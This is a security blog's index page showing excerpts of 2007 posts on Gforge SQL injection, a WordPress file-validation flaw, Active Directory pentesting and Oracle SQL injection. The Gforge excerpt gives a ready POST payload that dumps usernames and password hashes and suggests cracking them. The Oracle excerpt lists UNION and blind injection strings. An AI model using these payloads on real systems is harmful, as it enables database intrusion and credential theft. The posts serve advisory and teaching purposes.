Recent Posts

Categories

Archives

Gforge SQL Injection

September 13, 2007

Original Advisory: http://www.portcullis-security.com/179.php  The file /www/people/editprofile.php seems to be vulnerable to sql injection at multiple points. The exploit is fairly easy, one post request returns all the usernames and hashes from the backend database. The hashes can then be cracked using john-the-ripper. Exploit:- POST request to:/www/people/editprofile.php skill_delete%5B%5D=484)+UNION+ALL+SELECT+user_name||unix_pw+ from+users–%3d1&MultiDelete=Delete works against… Read More

Yet Another Insecure WordPress Code

August 29, 2007

Package:- wordpress 2.2.2.zip file:/wp-admin/admin- functions.php function validate_file( $file, $allowed_files = '' ) {         if ( false !== strpos( $file, './' ))                 return 1;         if (':' == substr( $file, 1, 1 ))                 return 2;         if (!empty ( $allowed_files ) && (!in_array( $file, $allowed_files ) ) )… Read More

Pen Testing Windows Active Directory

July 28, 2007

I have put together some thoughts on conducting a penetration test on a windows active directory. Currently this article focus on these 2 scenarios:- 1. A pentester is allowed to plug his laptop into the target network. 2. A pentester is not allowed to plug his laptop and only has… Read More

SQL Injection In Oracle

July 11, 2007

1. Finding table names select table_name from+user_tables Example:- http://192.168.2.199/ora.php?id=101+union+all+select+ table_name+from+user_tables Blind Injection:http://192.168.2.199/ora.php?id=101 and ascii(substr((select+table_name+from+user_tables where rownum=1),1,1))>100 ———————————————– 2. Iterating through the different rows: Unfortunately it is not as straight forward, there is no LIMIT command in oracle. Syntax:-select column_1, column_2 from (select rownum r_, column_1, column_2  from table_1, table_2  where… Read More

SQL Injection And UTF 7 encoding

July 5, 2007

Query:- There is a web application vulnerable to SQL Injection, but the web server has added protection like magic_quotes or the application calls the function add_slashes, which means i can't insert  a single quote and thus cant exploit a SQL Injection. The injection point is in a string field. Does… Read More